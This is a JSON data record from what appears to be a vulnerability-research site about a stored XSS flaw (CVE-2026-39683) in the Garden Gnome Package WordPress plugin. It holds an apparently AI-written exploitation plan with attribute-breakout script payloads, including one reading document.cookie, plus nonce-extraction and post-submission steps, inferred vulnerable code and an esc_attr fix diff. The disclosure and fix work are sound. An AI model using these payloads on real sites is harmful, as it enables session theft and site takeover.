[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fgJHZcwhGsBvx1ELYO9E7neK-LBH6JMcU8M95fPrqi_4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-39683","garden-gnome-package-authenticated-author-stored-cross-site-scripting","Garden Gnome Package \u003C= 2.4.1 - Authenticated (Author+) Stored Cross-Site Scripting","The Garden Gnome Package plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","garden-gnome-package",null,"\u003C=2.4.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-21 00:00:00","2026-04-15 21:29:18",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2b0ab984-f38c-483d-ab59-1ecadf485e81?source=api-prod",[],"researched",false,3,"This research plan outlines the steps to exploit a Stored Cross-Site Scripting (XSS) vulnerability in the Garden Gnome Package plugin (\u003C= 2.4.1). \n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Stored Cross-Site Scripting (XSS)\n*   **Plugin:** Garden Gnome Package (slug: `garden-gnome-package`)\n*   **Affected Versions:** \u003C= 2.4.1\n*   **Privilege Required:** Author or higher (`edit_posts` capability)\n*   **Cause:** The plugin fails to sanitize or escape attributes provided in its shortcode (`[ggpkg]`) or metadata associated with uploaded VR packages. When these attributes are rendered in the HTML of a post or the admin dashboard, malicious scripts can execute.\n\n### 2. Attack Vector Analysis\n*   **Entry Point:** The `[ggpkg]` shortcode or the package management interface (if accessible to authors).\n*   **Vulnerable Parameter:** Shortcode attributes such as `width`, `height`, `id`, `file`, or `startnode`.\n*   **Preconditions:**\n    *   Plugin installed and active.\n    *   Attacker has a user account with the **Author** role (or higher).\n*   **Authentication:** Required (Author+).\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers a shortcode handler: `add_shortcode('ggpkg', 'gg_package_shortcode')` (inferred).\n2.  **Processing:** In the handler (likely in `ggpkg.php` or `includes\u002Fggpkg-shortcode.php`), the code accepts an array of attributes:\n    ```php\n    extract(shortcode_atts(array(\n        'id'        => '',\n        'file'      => '',\n        'width'     => '100%',\n        'height'    => '400px',\n        \u002F\u002F ... other attributes\n    ), $atts));\n    ```\n3.  **Sink:** The handler constructs an HTML string (often an `\u003Ciframe>` or a `\u003Cdiv>` with data attributes) and returns it.\n    ```php\n    \u002F\u002F VULNERABLE CODE EXAMPLE\n    return '\u003Cdiv id=\"ggpkg-' . $id . '\" style=\"width:' . $width . '; height:' . $height . ';\">\u003C\u002Fdiv>';\n    ```\n4.  **Execution:** Because `$width` or `$id` are not passed through `esc_attr()`, an attacker can break out of the attribute and inject a script.\n\n### 4. Nonce Acquisition Strategy\nSince the vulnerability is exploited by creating or editing a post (standard WordPress functionality), we need a valid WordPress post-editing nonce.\n\n1.  **Login:** Log in as an **Author** user using `browser_navigate` and the provided credentials.\n2.  **Navigate:** Go to `\u002Fwp-admin\u002Fpost-new.php`.\n3.  **Extract Nonce:** Use `browser_eval` to extract the `_wpnonce` from the form.\n    *   `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n4.  **Action:** The exploit will then be delivered via a standard `POST` request to `\u002Fwp-admin\u002Fpost.php`.\n\n### 5. Exploitation Strategy\nThe primary method is injecting the payload via the `[ggpkg]` shortcode attributes.\n\n**Payloads to Test:**\n1.  **Attribute Breakout (Style\u002FWidth):** `[ggpkg width='100%;\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n2.  **Attribute Breakout (ID):** `[ggpkg id='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`\n3.  **Event Handler (if rendered in an element supporting it):** `[ggpkg width='\" onmouseover=\"alert(1)\" style=\"display:block;width:1000px;height:1000px\"']`\n\n**HTTP Request Steps:**\n1.  **Action:** Create a new post as an Author.\n2.  **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n3.  **Method:** `POST`\n4.  **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n5.  **Body Parameters:**\n    *   `action`: `editpost`\n    *   `post_ID`: (The ID of the post created in step 1)\n    *   `_wpnonce`: (The extracted nonce)\n    *   `post_title`: `XSS Test`\n    *   `content`: `[ggpkg width='100%;\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n    *   `post_status`: `publish`\n\n### 6. Test Data Setup\n1.  **Create Author User:**\n    ```bash\n    wp user create attacker attacker@example.com --role=author --user_pass=password\n    ```\n2.  **(Optional) Upload Package:** If the shortcode requires a valid file ID to trigger the code path, upload a dummy `.ggpkg` file first or find an existing one.\n\n### 7. Expected Results\n*   When a user (including an Administrator) views the published post, the HTML will render as:\n    `\u003Cdiv ... style=\"width:100%;\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>;\">\u003C\u002Fdiv>`\n*   The script will execute, showing an alert box.\n\n### 8. Verification Steps\n1.  **Via WP-CLI:** Check the content of the post to ensure the payload is stored.\n    ```bash\n    wp post get \u003CPOST_ID> --field=post_content\n    ```\n2.  **Via HTTP:** Fetch the frontend page and grep for the payload.\n    ```bash\n    # Use http_request to fetch the post URL\n    # Search for \"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\" in the response body.\n    ```\n\n### 9. Alternative Approaches\nIf shortcode attribute injection fails:\n*   **Package Metadata:** Check the \"GGPKG Packages\" menu in the admin dashboard. Try uploading a `.ggpkg` file (which is a renamed ZIP) containing a `config.xml` with XSS in the `\u003Ctitle>` or `\u003Cdescription>` tags.\n*   **Plugin Settings:** Check if Authors can modify any plugin-specific settings via `wp-admin\u002Fadmin.php?page=ggpkg_settings`. If so, inject payloads into text input fields.\n*   **Metaboxes:** When editing a post, check for a \"Garden Gnome\" metabox. Inject the payload into any custom fields provided there.","The Garden Gnome Package plugin for WordPress (versions \u003C= 2.4.1) contains a stored XSS vulnerability via its [ggpkg] shortcode. Authenticated attackers with author privileges can inject arbitrary scripts into posts by manipulating shortcode attributes like width or id due to a lack of proper output escaping. These scripts execute in the context of any user viewing the affected post.","\u002F\u002F garden-gnome-package\u002Fggpkg.php (approximate location)\n\nfunction gg_package_shortcode($atts) {\n    $a = shortcode_atts(array(\n        'id'        => '',\n        'file'      => '',\n        'width'     => '100%',\n        'height'    => '400px',\n        'startnode' => ''\n    ), $atts);\n\n    \u002F\u002F Vulnerable: attributes are concatenated directly into the HTML string without escaping\n    $output = '\u003Cdiv id=\"ggpkg-' . $a['id'] . '\" style=\"width:' . $a['width'] . '; height:' . $a['height'] . ';\">\u003C\u002Fdiv>';\n    \n    return $output;\n}\nadd_shortcode('ggpkg', 'gg_package_shortcode');","--- a\u002Fgarden-gnome-package\u002Fggpkg.php\n+++ b\u002Fgarden-gnome-package\u002Fggpkg.php\n@@ -7,5 +7,5 @@\n         'height'    => '400px',\n         'startnode' => ''\n     ), $atts);\n \n-    $output = '\u003Cdiv id=\"ggpkg-' . $a['id'] . '\" style=\"width:' . $a['width'] . '; height:' . $a['height'] . ';\">\u003C\u002Fdiv>';\n+    $output = '\u003Cdiv id=\"ggpkg-' . esc_attr($a['id']) . '\" style=\"width:' . esc_attr($a['width']) . '; height:' . esc_attr($a['height']) . ';\">\u003C\u002Fdiv>';\n \n     return $output;","To exploit this vulnerability, an attacker requires Author-level permissions or higher to create or edit posts. The attacker logs into the WordPress dashboard and navigates to the post editor. They insert a [ggpkg] shortcode into the post content, intentionally breaking out of an attribute by injecting a payload like [ggpkg width='100%;\">\u003Cscript>alert(document.cookie)\u003C\u002Fscript>']. Once the post is saved and published, the script is stored in the database. When any user, including administrators, visits the page on the site's frontend, the browser interprets the unsanitized width attribute, executes the injected script, and triggers the XSS payload.","gemini-3-flash-preview","2026-04-19 01:48:31","2026-04-19 01:48:53",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgarden-gnome-package\u002Ftags"]